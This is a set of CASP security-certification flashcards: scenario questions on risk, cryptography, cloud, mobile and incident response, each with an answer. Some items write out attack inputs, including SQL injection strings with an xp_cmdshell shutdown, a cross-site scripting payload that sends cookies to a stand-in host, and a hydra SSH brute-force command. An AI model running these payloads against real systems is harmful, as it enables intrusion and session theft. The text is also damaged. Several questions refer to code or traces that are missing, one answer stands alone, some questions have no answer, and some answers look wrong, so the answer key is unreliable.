CASP Flashcards by Moses Myers

Which of the following encryption methodologies should be implemented in an environment where all users need access to bulk storage, but not all users have authorized access to each individual database entry?

Row-level encryption

How well did you know this?

Not at all

Perfectly

A security bulletin describes a vulnerability in a common blogging platform due to XML HTTP Request (XHR) processing of state information. Which of the following technologies would this be a part of?

CSS

How well did you know this?

Not at all

Perfectly

An organization is developing a new web application that can provide the ability for customers to retrieve fast quotes on products and services. After going live with the web application, the organization is seeing system outages and delays in presenting quotes to customers. Further investigation reveals the logs are seeing SQL queries with $username = ‘1’ or ‘1’ = ‘1’ that give results. Which of the following could prevent this query from being successful?

Stored procedures

How well did you know this?

Not at all

Perfectly

An information systems manager has been asked to manage the consolidation of two merging companies’ IT infrastructures. As part of the project the manager will need to evaluate the impact of regulatory requirements relating to storage of data in data centers. Which of the following is a regulatory consideration the manager should evaluate?

Geographical location of data centers

How well did you know this?

Not at all

Perfectly

An online gaming company receives two DoS attacks per year. Losses are estimated to be $200,000 per
incident. Executives have decided to invest $75,000 annually in performance and security services, which
reduced the annual loss by 30 percent. Which of the following is the return on investment?

$45,000

How well did you know this?

Not at all

Perfectly

A company is evaluating an investment of $1.5 million in IT infrastructure upgrades. The upgrades will take
three years to be fully implemented but will be 80% implemented within 60 days. The remaining upgrades will be completed on an evenly distributed schedule. The board of directors is only willing to make the infrastructure investment if the cost of the upgrades can be recouped within 12 months. It is estimated that for every 10% of the infrastructure that is upgraded, an additional $200,000 in profit will be realized. Which of the following describes the length of time it will take for the investment to be fully paid for?

Less than two months

How well did you know this?

Not at all

Perfectly

A security architect has the following requirements for a system:
1. Must be developed with an object-oriented programming language
2. Must encrypt data at rest
3. Must comply with corporate PII policies
4. Must support multi-factor authentication
5. Should be built on a trusted OS
Which of the following contractual documents is the correct place to list these requirements when initially
surveying the vendor space?

RFT

How well did you know this?

Not at all

Perfectly

A company is deploying smartphones for the mobile workforce. The devices will be used for personal and
business use, but are owned by the organization. Sales personnel will save new customer data via a custom application developed by the company. This information will integrate with the phones’ contact information application storage and populate new records into it. The custom application’s data is encrypted at rest and the connection to the back office is considered secure. The Chief Information Security Officer (CISO) has concerns that the customer contact information might accidentally leak due to the devices’ limited security capabilities and controls planned. What is the MOST effective security control to implement to lower the risk?

Restrict contact information storage data-flow so that it is only shared with the custom application

How well did you know this?

Not at all

Perfectly

A vulnerability scanner report shows that a client-server host monitoring solution operating in the credit card corporate environment is managing SSL sessions with a weak algorithm which does not meet corporate policy. Which of the following are true statements? (Select TWO).

The client-server handshake could not negotiate strong ciphers.
The client-server handshake is configured with a wrong priority.

How well did you know this?

Not at all

Perfectly

A security manager has received the following email from the disaster recover project manager:
During part of the recent COOP exercise, I determined that we do not have sufficient network performance at
our hot site to support production-level operations. We found that if we scaled down the sensitivity on the WAF, we achieved the requisite level of performance required to support the productivity needs of the organization. Based on the information provided, which of the following would be the MOST appropriate response to this inquiry from the project manager?

If the current configuration at the primary site is working correctly, there may be other issues at the hot site.

How well did you know this?

Not at all

Perfectly

An organization is in the process of implementing a SaaS customer relationship system for its bankers. The
SaaS provider supports standards-based authentication integration mechanisms. There are a number of requirements that need to be met as part of the deployment, including:
- The bankers will not need to enter a password to access the system once logged onto the network.
- The access provisioning process into the SaaS system will be part of the authentication request.
- Authorization to the system will be based on existing groups and permissions.
Which of the following MUST be implemented to meet all the above requirements?

OpenID provider

How well did you know this?

Not at all

Perfectly

The security administrator is tasked with finding a security product to replace the current anti-spam system in the company. After reading through NIST documents and the OWASP top ten protection guide, the security administrator is now ready to approach vendors. Which of the following types of research documents should the administrator look for? (Select THREE).

RFI, RFQ and RFP

How well did you know this?

Not at all

Perfectly

An IT security architect is defining the technology road map for a company. In particular, the security architect is researching and analyzing industry trends in automated transmission of security content. Which of the following would help to evaluate products in this area?

SCAP

How well did you know this?

Not at all

Perfectly

Company A is attempting to acquire competitor Company M. Both companies are publicly traded and must adhere to merger acquisition regulations. The two companies are currently awaiting approval from Company M’s board of directors. During this decision process both companies have new products that are soon to be released. With the news of these impending events, company A’s security team is seeing an increase in whaling attacks targeting senior executives. Which of the following can be used to mitigate the risk?

Follow the communications policy for acquisitions

How well did you know this?

Not at all

Perfectly

The company’s communications department is taking photos of employees at multiple locations to showcase
the corporate culture. Some of the pictures include data-center facilities. Which of the following sensitive
information should be removed prior to the posting pictures? (Select TWO).

Employee badges and Geotags

How well did you know this?

Not at all

Perfectly

A company is seeking to reduce communications costs by implementing BYOD. The security administrator is
concerned that the existing security acceptable use policies will be ignored or ineffective on users’ personal devices. Corporate data on the personal devices must be protected from theft and should only be accessible through certain applications. The BYOD policy, however, allows users to still utilize devices for personal pictures, videos, or games. Which of the following should the security administrator implement to meet the security goals as well as the BYOD policy?

A managed sandbox

How well did you know this?

Not at all

Perfectly

Security architects often have to design systems for environments where different stakeholders have competing requirements. In addition to internal influences and competitors, which of the following often has a major effect on mandatory system design features?

Regulatory entities

How well did you know this?

Not at all

Perfectly

Routine review of new releases of content for specifications defined within SCAP can assist organizations in gathering and applying intelligence on which of the following types of information? (Select TWO).

Emerging attacks and Software vulnerabilities

How well did you know this?

Not at all

Perfectly

A technician is hardening a host that is going to be used as a web application server. The technician is making several registry setting changes to ensure all security events are being logged for review. Two weeks later, the technician gets a report that users are unable to login to the web server. Analyze the following group policies set by the technician:
-Set maximum security file size to 512KB
-Retain security logs is set to 90 days.
-Retention method for security logs is set to not overwrite events
-Retain application logs is set to 14 days
-Set maximum application log size to 1024KB
-Prevent local guest group from accessing application logs is enabled
Which of the following is causing the users’ inability to login to the web server?

Log file size is too small

How well did you know this?

Not at all

Perfectly

A new system that will share sensitive information is in the process of being implemented. Two users have
shared ownership of the sensitive data stored within the system and they are performing separate data
classification exercises. Joe’s data classification matrix is shown below:
RECORD TYPE CONFIDENTIALITY INTEGRITY AVAILABILITY
User health record HIGH HIGH MEDIUM
User address HIGH MEDIUM LOW
Ann’s data classification matrix is also shown below:
RECORD TYPE CONFIDENTIALITY INTEGRITY AVAILABILITY
User department LOW LOW LOW
User budget MEDIUM HIGH MEDIUM
User’s supervisor LOW LOW LOW
Given the above information, which of the following is the appropriate individual sensitivity level with respect to CIA and aggregate CIA score which will be applied to the system storing such data?

Confidentiality=HIGH, Integrity=HIGH, Availability=MEDIUM, Aggregate=HIGH

How well did you know this?

Not at all

Perfectly

A security architect is designing a series of technical protect, detect, and respond security capabilities with
significant automation potential. One of the objectives is to ensure tools from various vendors can be
implemented and support standardized data exchange. The architect would like to initially select a solution that
supports automated configuration checklists. Which of the following solutions should be selected?

SCAP

How well did you know this?

Not at all

Perfectly

A company has reported several web applications are experiencing errors related to unsecure certificates from the web browser. A security consultant discovers Internet-facing web servers, as well as intranet and internal servers, are configured with 1024-bit key lengths. Which of the following will resolve the web browser errors?

New certificates will need to be issued to support 2048-bit RSA key lengths

How well did you know this?

Not at all

Perfectly

After a recent breach, a company discovers a web server could not be updated due to incompatibilities with the local legacy database. The chief information officer has decided to implement a design that allows for easier updating of discrete components of the company’s IT infrastructure. Which of the following principles BEST achieves the CIO’s objective? (Select TWO).

Select products developed by established companies and Leverage protocols from RFC documents

How well did you know this?

Not at all

Perfectly

A security architect receives a 42-page document of project specifications from the lead developer. According to corporate policy, the message is sent using the PKI system. While the architect is able to read the document,the digital signature has failed validation. The architect calls the developer to see if the document can be sent again. The developer says this happens all the time and the document is probably fine. Which of the following should the architect be concerned about?

The integrity of the document and non-repudiation of the sender are lost without a valid digital signature.

How well did you know this?

Not at all

Perfectly

A security administrator has discovered a user may be sending sensitive data communications to external parties. Law enforcement is not ready to prosecute the case against the user but has asked the administrator to protect any current and future evidence that may assist in the case. The user must be allowed to continue working until a change is formally issued. Which of the following should the administrator implement to meet these requirements?

Legal hold

An employee from finance was dismissed when it was discovered that the employee had been committing financial fraud for several years. The most trusted senior manager in finance has been reassigned the duty of performing wire transfers. The Chief Financial Officer (CFO) is asking the Chief Information Security Officer (CISO) to implement stronger controls to secure how the transfers are performed. Which of the following responses should the CISO deliver?

Suggest detective controls and separation of duties and explain why they may be more effective mitigation strategies.

During a new desktop refresh, all hosts are hardened at the OS level before deployment to comply with policy. Six months later, the company is audited for compliance to regulations. The audit discovers that 30 percent of the desktops do not meet regulations because the devices are consistently being changed to override settings that do not meet policy. Which of the following is the BEST solution to correct the issue and prevent future noncompliance?

Implement group policy to enforce configuration settings

A hacker wants to target a local electronics distributor. The hacker goes to the distributor's website and displays the HTML code on the current page. Within the HTML, the hacker finds a snapshot of the code: QUANTITY: The hacker recognizes the vulnerability and modifies the line of HTML code to read: Which of the following vulnerabilities has the hacker taken advantage of?

Field manipulation

A security architect is evaluating new UTM appliances for a large streaming video provider company. The field of potential devices has been the three leading products based on a market survey where the main criteria was the total number of endpoints protected. During evaluation the three UTM's, each was further tested for throughput under normal conditions and attack conditions, amount of latency between attacks and administrative usability (scored from 1 to 5 with 5 being perfect usability). The results of the testing are shown in the table below: UTM 1 2 3 Normal throughput 1Gbps 5Gbps 1Gbps Attacked throughput .1Gbps 1Gbps .5Gbps Latency 50ms 60ms 150ms Usability 4 2 3 Which of the following three UTM's should be recommended and why?

UTM 2 because it has the highest throughput in both conditions

During an audit of firewall rules, an auditor noted that there was no way to find out who had allowed port 3389 to be available to the Internet. The auditor gave the company a negative mark on their audit, and requested that within 30 days the company produce a written plan to deal with such items in the future. Given the scenario, which of the following will be MOST effective in securing the firewall?

Implement a detailed change management system.

A security administrator must ensure two-factor authentication is enforced when system administrators log in via SSH to sensitive systems. The company already implements certificate-based authentication on sensitive systems, but a recent audit uncovered some system can log on without the second factor. Which of the following has the security administrator overlooked when implementing certificate-based authentication?

System administrators have the ability to issue self-signed certificates to themselves

A new application written in C++ has been completed in the development environment and has been promoted into the testing environment. To test this application from a security perspective, which of the following activities should occur?

Static code scan

The sales staff wants to use a cloud-based customer relationship (CRM) solution. Customer databases are highly prized and a closely guarded secret. The information security group is raising concerns about data privacy while reviewing the cloud CRM solution. The following are critical needs of the sales department: - Lightweight user interfaces for interaction with CRM - Minimal learning curves for staff - Consolidated software updates and feature rollouts - Accessible from anywhere To mitigate information security concerns, the following need to be in place: - Strong authentication - Encrypted data transfer to/from CRM - Not publically accessible Which of the following BEST meets the identified needs?

Use a SaaS CRM solution hosted in a local datacenter, accessed via a HTTPS-enabled interface

While analyzing network traffic, a security engineer discovers that confidential emails were passing between two users who should not have had this information. The two users deny sending confidential emails to each other. Which of the following security practices would allow for non-repudiation and prevent the users from removing emails such as these from their accounts? (Select TWO).

Digital Signature and Legal hold

A penetration test discovers a server that is potentially vulnerable to a specific exploit. If the exploit is successful, the penetration tester would like to establish a remote administrator session to the server. The server uses a host-based firewall which blocks all incoming connections. Which of the following payloads should be delivered with the exploit to establish a remote administrator session?

Reverse TCP shell

A security administrator has uncovered an unknown executable file named UNKOWNFILE.EXE on the company's web server. Although the executable is not triggering the host-based antivirus system, it appears it has been loaded into memory and initiated a TCP connection with a remote host. The security administrator uploads the file to a cloud-based antivirus system and reviews the following information: SAMPLE FILE RESULTS SIMILARITY SCORE (%) UNKOWNFILE.EXE TROJ.GEN.39133 90% Which of the following findings should the security administrator include in the web server security report based in the above information? (Select TWO).

The sample binary code is a variant of TROJ.GEN.39133 Fuzzy hashing analysis was used to determine if the sample was malware

The network administrator at an enterprise reported a large data leak. One compromised server was used to aggregate data from several critical application servers and sent it out to the Internet using HTTPS. Upon investigation,there have been no user logins over the previous week and the endpoint protection software is not reporting any issues. Which of the following BEST provides insight into where the compromised server collected the information?

Review the flow data against each server's baseline communications profile

A company has recently discovered the integrity of its data was compromised 7 days ago. The logs indicate the changes were occurring from an account with privileged access. Further analysis has determined the account is associated with a former employee who left 4 weeks ago. Which of the following could have prevented this compromise?

Deprovisioning process

An organization is in the process of reviewing its DRP to ensure that critical systems are identified and to determine the maximum amount of time those systems can be down. Which of the following will the business need to perform?

Business impact analysis

The lead software developer wishes to distribute a company's application along with MD5 hashes of the files. The security administrator argues that this method of distribution is not sufficient, and the software should be digitally signed. Which of the following further explains the security administrator's argument?

While the MD5 hash ensures the integrity of the files, it does not ensure authentication or non-repudiation.

A network engineer wants to deploy user-based authentication across the company’s wired and wireless infrastructure at layer 2 of the OSI model. Company policies require that users be centrally managed and authenticated and that each user’s network access be controlled based on the user’s role within the company. Additionally, the central authentication system must support hierarchical trust and the ability to natively authenticate mobile devices and workstations. Which of the following are needed to implement these requirements? (Select TWO).

LDAP RADIUS

A public utility company has recently seen an increase in spear phishing attacks that have occurred against targeted employees. The company is relatively small and users manual processes to monitor such attacks. The company then receives a report that the public website has been defaced with hacktivist comments. The company cannot isolate the server, as certain components are used to process payments via the public website, but quickly remediates the defacement. Which of the following MOST likely occurred in addition to the defacement?

Payment card information was stolen.

After recently failing a security audit, a company has been tasked with making sure that all sources of logs are being analyzed by SIEM for event correlation. The Chief Security Officer (CSO) has tasked the security architect with discovery of all sources of logs within the company, and solutions how to get logs to the SIEM. Given the task, which of the following would have to occur FIRST in order to get started?

Validate the source types that SIEM can handle

The administrator is attempting to secure an iSCSI-based storage array that uses deduplication. The administrator captures several datastreams between the storage array and the user's PCs to determine if confidential data can be collected. Which of the following would MOST likely result from the administrator's packet captures?

The capture is insecure, as it can be reassembled, but to use the data the administrator would need to know the deduplication method

The Chief Information Security Officer (CISO) at a large organization has been reviewing some security related incidents and comparing them to current industry trends. The desktop security engineer feels that the use of USB storage devices on office computers has contributed to the frequency of security incidents. The CISO knows the acceptable use policy prohibits the use of USB storage devices. Every user receives a pop-up warning about the policy upon login. The SIEM system produces a report of USB violations on a monthly basis, yet violations continue to occur. Which of the following preventative controls would MOST effectively mitigate the logical risks associated with the USB storage devices?

Implement group policy objects

A security administrator is reviewing the company RA to ensure all required components are being addressed. Which of the following are required components of a RA that are used by the business to evaluate the plan for continued service? (Select THREE).

Loss expectancy Threat factor identification Mean time between failures

A penetration tester exploits a bug in the web services of a UNIX server as part of a penetration test. The penetration tester is dropped to the following prompt: nobody@server$ After executing a local command in the /var/www directory while trying to exploit the database, the prompt changes to: Which of the following attacks was successfully utilized?

Privilege escalation

A security administrator receives an advisory from the video conference vendor. The advisory states that if not secured, video streams are susceptible to a session hijacking attack that would allow the video stream to be intercepted and recorded for later playback. In attempting to test this attack on the corporate network, the administrator receives the following output from a video stream: Which of the following can the security administrator conclude from the network trace?

The video stream is secured with IPSec and is not vulnerable to the vulnerability in this advisory?

The increased usage of BYOD policies has introduced a shifting risk environment for corporate IT security staff due to the now-porous nature of the network boundary and devices comprising the network. This risk is often accepted or mitigated due to:

user demand for faster technology deployments than those traditionally supported in a corporate environment.

A penetration tester has been contracted by a company to conduct brute force attempts against SSH that is available to the Internet. The penetration tester must show the commands and tools used. Given the conditions, which of the following would MOST likely be the command used to brute force SSH?

"hydra -L users.txt -P passwords.txt 1.1.1.1 ssh"

A Chief Security Officer (CSO) wants to test the company network for vulnerabilities. The test must be performed in the shortest amount of time with provable results and include unannounced testing of incident response procedures. Which of the following testing methodologies should be used?

White box

The finance department has purchased a cloud SaaS solution without consulting the IT department. As a result, the IT department has to manage the ongoing life cycle of 40,000 employees and their passwords. The department wants to remove the administration of password resets and the creation of user identities. The user experience should be like other internal applications where the authentication process is seamless after the user has logged into a desktop. Which of the following solutions should be recommended?

SAML is implemented with extended attributes for identity provisioning.

A security engineer is analyzing security differences between commercial products. The engineer is implementing one-time password authentication schemes that are based on software or hardware tokens where the secret key is shared between the server and the token. Which of the following BEST describes the main design differences?

On a hardware token device, the secret key is not transferred during the authentication process so it only needs to secured at rest

A company recently hired a risk and vulnerability assessment team to assess the IT infrastructure. The team will be conduction several engagements required by the company's statement of work. The team has the following requirements: 1. Analyze for known open ports that are used during exploitation 2. Leverage public data to discover sensitive information 3. Detect external vulnerabilities 4. Determine missing patches 5. Avoid disruption to running services 6. Use automated tools where possible to contain costs Which of the following tools are BEST to use to perform the above tasks? (Select THREE).

Vulnerability scanner Port scanner Whois

A university has experienced an unusually high number of cyber bullying incidents, which are occurring through a new mobile social application. The mobile application provides a venue for users to publish temporary anonymous messages to a public bulletin board. Students who live in the residence halls, which are located on the southeast side of the campus, are being targeted by other students who live in the same residence halls. The security administrator, whose office is located on the northwest side of the campus, is unable to verify the cyberbullying claims while reviewing the content of the public bulletin board. Which of the following should the security administrator do to validate the cyberbullying claims?

The security administrator should post messages to the bulletin boards from a university-provided phone and wait for a reply

While diagnosing a multipath problem with a SAN, the administrator notices Fibre Channel logins on the SAN from an unknown host with a WWN 00:50:78:3f:ab:3c:15:9e. Since the host is not defined, the storage system has named it Host_0050783fab3c169e. Which of the following is the MOST likely cause of the issue?

The host is zoned incorrectly.

During a penetration test, it is requested that the tester perform client side testing of a web application that is only available internally. This web application has no SSL and is available for all employees to use. The goal of the client side test is to evaluate the server side validation of all inputs going into the web application that is available on the network. Which of the following is the BEST tool to use in this scenario?

HTTP interceptor

An organization recently upgraded its wireless infrastructure to support 802.1x and require all clients to use this method. After the upgrade, several critical wireless clients fail to connect because they are only pre-shared key compliant. For the foreseeable future, none of the affected clients have an upgrade path to put them in compliance with the 802.1x requirement. Which of the following provides the MOST secure method of integrating the non-compliant clients into the network?

Create a separate SSID and pre-shared WPA2 key on a new network segment and only allow required communications paths

In reviewing the budget proposal by the Chief Information Officer (CIO), the Chief Financial Officer (CFO) finds a significant portion of the budget is allocated for upgrades to unsupported hardware and software, which are long past their end-of-life. The CFO sees the year-to-year fluctuation as a problem. From the CFO's perspective, which of the following BEST describes the CIO's budgetary obstacle?

The CIO should consider vendor-hosted services rather than simply replacing systems

The Human Resources administrator has initiated a forensics investigation about a user who was recently terminated. The subsequent forensics investigation found that the terminated user had downloaded a series of files that contained sensitive information about current employees. That file had been overwritten with a file of the same size and name of the original file. This security incident could have been prevented with a combination of which of the following security controls? (Select TWO).

FIM | DLP

A company is purchasing a SaaS CRM solution. While conducting due diligence, it was identified that the SaaS provider would be hosting customers' health-identifiable information in a country that is beyond the regulators' risk appetite. The solution has the following requirements: - End users need to view all customer data in the CRM - No sensitive data is to be hosted outside the country - Performance is not a concern Which of the following controls should the security architect recommend as an option to the business owner to meet the above requirements?

Encryption gateway

The incident response team has completed an exercise that involved keeping the businesses essential functions operational during an incident. The team has analysed strengths and weaknesses, and has compiled a document and that summarizes the findings. The Chief Security Officer (CSO) approved the document and sent it to the company's president. Which of the following will the president receive from the CSO?

AAR

A system administrator notices a large amount of data being transmitted from an internal resource to an unidentified external IP. Performing a traffic capture of the outgoing packets, it was determined that a Diffie- Hellman key exchange is occurring. Which of the following would be needed to perform an impact analysis?

Data content

A security architect wants to install a new sandboxing appliance on the network. Which of the following controls should be implemented to inspect covert and suspicious Internet traffic?

In-line with SSL inspection

Company A had an existing nightly batch transfer of data. This process was based on AES-256 Zip encryption of multiple files from the staging directory of company B's SFTP server. Company B is now required to send files to Company A in real time. This new dasta transfer must be encrypted, may contain PII, and must implement integrity checking. Which of the following modifications will meet these requirements?

Replace AES-256 Zip with SSH

The Chief Information Security Officer (CISO) for a passenger airline is responding to a cybersecurity risk assessment for an aircraft mission system. One of the many findings showed the aircraft's mission computer performs automatic flight control, and attackers can impact the integrity of this localization technology to cause loss of life and property. Insufficient data is available to determine the probability of occurrence, but the assessment revealed the attack could be easily executed within the aircraft's line of sight. The vulnerabilities enabling the attack can be corrected, but the fix require all aircraft to be returned to depot for major component upgrades by the manufacturer. Given this scenario, which of the following BEST represents an appropriate response strategy?

Mitigate the risk by returning all aircraft to the manufacturer depot for appropriate fixes

A penetration tester is able to obtain the /etc/ shadow file from an important Linux server. The penetration tester considers many different password cracking tools and techniques to use on the file before deciding to try a rainbow tables attack. Which of the following BEST describes the results the penetration tester might see using this type of attack?

Hashed passwords on a Linux system are salted, which makes precomputed rainbow tables attack ineffective.

A OLA relates to an SLA is that it:

determines internal organizational relationships and requirements to execute the SLA

A security engineer is faced with competing requirements from the networking group and database administrators. The database administrators would like ten application servers on the same subnet for ease of administration, whereas the networking group would like to segment all applications from one another. Which of the following should the security administrator do to rectify this issue?

Recommend classifying each application into like security groups and segmenting the groups from one another.

A company is trying to decide how to manage hosts in a branch location connected via a slow WAN link. The company desires to provide the same level of performance and functionality to the branch office as it provides to the main campus. The company uses Active Directory for its directory service and host configuration management. The branch location does not have a datacenter, and the physical security posture of the building is weak. Which of the following designs is MOST appropriate for this scenario?

Deploy a corporate Read-Only Domain Controller to the branch location.

An organization has identified a compromised workstation on its network. The organization wants to learn as much as it can about the attack behavior while minimizing impact to the business. Which of the following is the organization's BEST course of action?

Logically move the infected system to an isolated network that still allows outbound connections, create an image of the system's memory, and capture and inspect all network traffic.

The SOC has received several reports about the organization's financial site. The reports state the site has been shutting down for no apparent reason. The security analyst has attempted to troubleshoot the issue and found the following code after performing an internal web application assessment: Username: aaaaaaaaaaaaaa ' Password: '; exec xp_cmdshell 'shutdown' -- Which of the following is the vulnerability and what is the appropriate security control to mitigate this? (Select TWO).

Input validation | SQL injection

Ann, a student, is interested in information on the most current security trends for a research assignment. She opens a web browser, clicks a link to a search engine, and types "security trends" in the search field. After viewing the results, Ann clicks on a link to a forum site not hosted in her country. Unsure of the reputation of the site, she decides to view the source code of the current web page. Ann notices the following within the code: http://www.securityforum.com/page.php?variable=">document.location='http:// www.badsecurityforum.com/cgi-bin/cookie.cgi?'%20+document.cookie Which of the following attacks has Ann discovered?

Cross-site scripting

A system administrator is implementing an internal DNS infrastructure. Configuring which of the following items would help ensure the DNS servers do not become single points of failure and enable them to respond appropriately to queries for which they are not authoritative?

Root hints

An information systems security manager is part of a change control board for a software development project that is still in its first phase. The process of mapping security and privacy requirements is being performed. Upon signing off on this phase of the project, which of the following SSDLC activities should be performed NEXT? (Select TWO).

Plan dynamic analysis activities. | Plan security design reviews.

A company implements a workstation life cycle management process in the following order: -Acquisition -Hard drive imaging -Assignment -Transfer -Surplus Workstations are transferred to employees across different units only when an employee leaves the organization and another employee is hired. Which of the following security best practices should the company address throughout its asset life cycle management process to ensure data confidentiality? (Select TWO).

Developing asset image standardization | Enforcing hard drive sanitation

A system administrator receives an alert that a buffer overflow has taken place in an application. The administrator is less concerned with the impact of the buffer overflow due to the previous implementation of which of the following security techniques? (Select TWO).

Address space layout randomization | Non-executable space protection

A security tester is inspecting a mobile banking application that makes requests to an externally accessible transactional API. The tester performs the following command: $ nc api.example.com 80 OPTIONS / HTTP/1.1 Host: api.example.com The server responds with: HTTP/1.1 200 OK Server: Microsoft-IIS/7.5 Connection: close Allow: GET, POST, PUT, DELETE, TRACE, OPTIONS Content-length: 0 Which of the following are the security weaknesses evident in this scenario? (Select TWO).

Platform information is disclosed. | PUT and DELETE methods are enabled.

ABC Corporation uses multiple security zones to protect systems and information, and all of the VM hosts are part of a consolidated VM infrastructure. Each zone has different VM administrators. Which of the following restricts different zone administrators from directly accessing the console of a VM host from another zone?

Organize VM hosts into containers based on security zone and restrict access using an ACL.

An information security officer is working with an organization's contracting office to develop an acquisition strategy for a new cloud-based services contract. Unfortunately, the requirements for the acquisition are not well defined, and the organization has not been able to independently survey the industry to determine the best course of action. In this scenario, which of the following would be appropriate to use as a FIRST step in the acquisition process?

RFI

A company needs to increase the security level of corporate users accessing IT resources from the Internet through personal and company-owned devices to comply with: 1. Cloud-based device configuration 2. Mobile encryption 3. Remote wiping These remote employees hold different computing platforms and are geographically dispersed. A security architect is evaluating solutions that meet industry accepted standards and regulations. Which of the following are the BEST solutions that the architect should recommend? (Select TWO).

BYOD policy enforcement | Mobile device management

Over the past two years, a company has recorded more than 200 incidents of privileged users failing to follow published guidance from the company with respect to sharing logins, misusing privileges, installing potentially malicious software and other less severe activities. Which of the following activities would BEST mitigate this situation?

Establish a cybersecurity awareness training program for management and staff.

An administrator wishes to replace a legacy clinical software product as it has become a security risk. The legacy product generates $10,000 in revenue a month. The new software product has an initial cost of $180,000 and a yearly maintenance of $2,000 after the first year. However, it will generate $15,000 in revenue per month and be more secure. How many years until there is a return on investment for this new package?

The system administrator recently upgraded the organization's physical server infrastructure. The infrastructure is hosting multiple sensitive virtual machines that are required to have a 99.9% uptime. The organization hired a third-party company to perform a security assessment to highlight the associated risks of having only one physical server. Which of the following is the GREATEST risk associated with having a single physical server?

Storage infrastructures with improper data isolation

A cybersecurity risk assessment of a major financial corporation revealed a vulnerability in the software that enables web-based money transfer services between accounts. Attackers can send commands to the service that allow them to move money between accounts. Authorized money transfers should follow successful user logins to the web portal and are processed after a one-hour delay. Correcting the problem associated with the money transfer service will require three months of software development. In the meantime, the corporation must continue to provide online money transfer services. Which of the following would MOST likely discover an attempted or successful attack?

A behavior-based IDS properly configured to identify requests without prior user authentication

An organization is seeing an increase in malicious software downloads known to be coming from suspicious websites. Existing security controls are now blocking all the malicious software. Which of the following can be implemented to control access to these websites? (Select TWO).

SSL inspection | Content filter

Recent news about a well-known security firm selling hacking tools that utilize zero-day exploits in popular applications has the Chief Security Officer (CSO) of a company concerned. The security of the company has NextGen firewalls with UTM services enabled, trending analysis through a SIEM. The employees, however, are allowed to use any devices they want to VPN to the company network and manage the customer environments. Which of the following is the BEST addition to the security plan that would help remediate the impact of such exploits?

Document BYOD policies and offer security training

A security solution architect is determining which cryptographic controls to use within a new externally facing banking web portal some controls will need to: - Protect the transport of the web front end - Sign payment transactions - Ensure cryptographic functions do not impact performance - Distribute tokens within three hours to a customer Which of the following solution components would BEST meet the above requirements?

Third-party trusted certificate, HSM, software tokens

A security manager is working with a software development manager to address relevant security bugs that were found in an already-released version of software. The development team has a large backlog of bugs that are being tracked and worked on. However, the backlog is only worked on when it is assigned to a specific major release development cycle. The security manager suggests moving from the current waterfall system to an agile development system. Which of the following BEST describes the security implications of this recommendation? (Select TWO).

SRTM may be implemented ahead of schedule. | The average time between bug reporting and resolution will fall.

A bank is in the process of implementing a digital credit card on smartphones as a new service to its customers. The solution will be deployed as a mobile application with integration back to the organization via API calls. The project has tight timelines, and the bank intends to be the first to hit the market with its product. The product must meet the following security requirements: - A PIN must be used to access the digital credit card. - The credit card number must not be stored on the smartphone. - It must be able to ask the customer to validate identity based on criteria. - Any information in transit and at rest must be protected. Which of the following security controls MUST be implemented to meet all of the above requirements?

Authentication, data masking, encryption, and authorization

An organization is releasing a new application for customers to allow non-sensitive transactions to be displayed within a mobile application with the following requirements: 1. Require integration with social media. 2. Consume basic identity information to validate the identity. 3. Require in-house development of the application. 4. Reduce the number of passwords the customer must remember. As part of the security development life cycle, which of the following should be recommended? (Select TWO).

Shibboleth integration | Storage of keys in the local keystore

Which of the following might an IT manager use to MOST effectively bridge the gap between technical personnel and non-technical personnel such as the data owner?

Provide additional training so the data owner understands the importance of supporting the protection of critical data.

The Chief Security Officer (CSO) has identified a significant risk with employees bringing mobile devices into the workplace. Even the CSO downloaded spreadsheets while on the go, and the data sits in a download folder on the CSO's mobile device. A committee determines a popular MDM platform will work well for offering FDE and doing a full tunnel back to the MDM for securely accessing any data. Which of the following risk strategies is being represented here?

Mitigate

A recent data security breach has forced a company to investigate all of its host machines for signs of compromise. The initial discovery of the compromise indicates the breach occurred due to a zero-day vulnerability with a popular spreadsheet application. The company wishes to enhance its security to detect such zero-day vulnerabilities in the future. Which of the following groupings of controls is the BEST to accomplish this goal?

NIDS, SIEM, OS hardening

A company Chief Information Officer (CIO) has mandated the design and implementation of a mobile end user device capability that permits employees to user their personal devices to access work content and email. Corporate policy requires that far stricter data-at-rest controls be afforded to company confidential data than that of personal or non-sensitive company data. To support this directive, mobile end user devices should use:

a container and cryptographic isolation.

A computer used by the Vice President of Human Resources is compromised when a spreadsheet file containing an embedded object is opened and a zero day vulnerability is exploited. The lead investigator wants to preserve as much information as possible about the compromise to ensure any encryption keys used by the malware are preserved, as it might aid in the reverse engineering of the malware. Which of the following actions should the lead investigator perform FIRST?

Ensure the PC is not turned off to preserve all temp files and any data loaded into memory.

Plan dynamic analysis activities. | Plan security design reviews.

Which of the following mechanisms prevents data integrity issues at the storage-volume level in a computing environment where heterogeneous OSs are accessing and sharing the same SAN infrastructure?

LUN masking

Which of the following is the security concept that ensures no single person can execute, audit, and authorize data access?

Separation of duties

After a recent internal breach, a company decided to regenerate and reissue all certificates used in the transmission of confidential information. The company places the greatest importance on confidentiality and non-repudiation and decided to generate dual key pairs for each client. Which of the following BEST describes how the company will use these certificates?

One key pair will be used for encryption and decryption. The other will be used to digitally sign the data.

As part of routine business operations, the security manager is reviewing the organization's telecommuting policies. During the review, the manager determines several technologies not previously covered in the policy must be addressed during revision. Before documenting the changes in the telecommuting policy, which of the following activities should be conducted FIRST?

Risk assessment

An organization is concerned that a former employee took a large number of files upon separation from the company. The organization's AUP does not address the users' right to privacy. Which of the following would the organization implement to BEST address this activity?

Install a DLP solution at the network edge that will detect excessive file transfers and identify the associated user.

A system administrator at a university is concerned that students may be able to manually configure a device to access the voice VLAN and intercept voice calls being made by faculty on the network. Which of the following is the BEST way for the administrator to secure the voice network from this type of attack?

Deploy 802.1x on the voice VLAN to disallow students, and use SRTP to secure voice communications.

A company routinely updates its virus definitions and anti-spam server. HIPS has also been installed on each desktop along with the antivirus clients. All users are able to access the Internet but all domain users on the corporate network are reporting connections issues while accessing a specific third-party cloud application. Users working from home on their corporate computers are not experiencing any issues accessing those same applications. Which of the following MOST likely describes the issue being experienced?

The company network has been blacklisted from accessing that application.

A small company with no IT management has just won a large contract requiring infrastructure hosting for government-owned applications. As part of the RFP response process, the company had to become formally certified against security management and quality standards. Which of the following is the BEST step for the company to take to ensure future technology deployments are consistent with the corporate mission and contractual requirements?

Hire a Chief Information Officer (CIO) to govern internal and external aspects of the company's IT deployments.

A security administrator configured the enterprise group policy server to disallow the use of a particular P2P filesharing application called SHARETHIS on employees' centrally managed desktops. Network traffic analysis and desktop application logs show the application is still being used by many employees across the organization. Which of the following configurations will BEST resolve this issue?
